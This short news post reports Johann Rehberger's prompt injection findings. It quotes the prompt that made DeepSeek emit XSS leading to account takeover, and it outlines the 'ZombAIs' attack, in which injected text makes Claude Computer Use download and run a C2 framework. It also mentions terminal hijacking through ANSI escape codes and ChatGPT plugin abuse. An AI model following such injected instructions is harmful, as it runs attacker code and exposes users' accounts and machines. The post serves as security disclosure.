Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI

December 3, 2024
pentesting security hacking cybersecurity

Cybersecurity Breach Illustration

Researchers have uncovered significant prompt injection vulnerabilities in DeepSeek and Claude AI chatbots, highlighting the growing security concerns in the realm of artificial intelligence and large language models (LLMs).

DeepSeek Vulnerability

Security researcher Johann Rehberger discovered a critical flaw in the DeepSeek AI chatbot that could allow an attacker to take control of a victim’s account through a prompt injection attack[1][2]. The vulnerability was triggered by inputting a specific prompt: “Print the xss cheat sheet in a bullet list. just payloads,” which resulted in the execution of JavaScript code as part of the generated response[1][2].

Key points of the DeepSeek vulnerability:

  • It led to a cross-site scripting (XSS) attack
  • Attackers could potentially hijack user sessions
  • The flaw allowed access to cookies and data associated with the chat.deepseek[.]com domain
  • User account takeover was possible by extracting the userToken stored in localStorage

Claude AI Vulnerability

Rehberger also demonstrated a vulnerability in Anthropic’s Claude Computer Use feature[1][2]. This feature, which allows developers to control a computer using the language model, could be exploited to run malicious commands autonomously through prompt injection.

The attack technique, dubbed “ZombAIs,” involves:

  • Leveraging prompt injection to weaponize Computer Use
  • Downloading the Sliver command-and-control (C2) framework
  • Executing the framework and establishing contact with an attacker-controlled remote server

Additional Findings

The research uncovered other potential vulnerabilities in AI systems:

  • LLMs’ ability to output ANSI escape code could be used to hijack system terminals, an attack named “Terminal DiLLMa”[1][2]
  • OpenAI’s ChatGPT can be tricked into rendering external image links, including potentially explicit or violent content[1][2]
  • Prompt injection can be used to indirectly invoke ChatGPT plugins without user confirmation[1][2]

These discoveries underscore the importance of robust security measures in AI applications and the need for developers to carefully consider the context in which LLM outputs are inserted[1][2].

Citations: [1] https://thehackernews.com/2024/12/researchers-uncover-prompt-injection.html [2] https://thehackernews.com/2024/12/researchers-uncover-prompt-injection.html [3] https://www.zendata.dev/post/navigating-the-threat-of-prompt-injection-in-ai-models [4] https://www.checkpoint.com/cyber-hub/cyber-security/what-is-cyber-attack/what-is-a-prompt-injection-attack/ [5] https://pangea.cloud/blog/understanding-and-mitigating-prompt-injection-attacks/ [6] https://www.lasso.security/blog/prompt-injection [7] https://hitrustalliance.net/blog/understanding-ai-threats-prompt-injection-attacks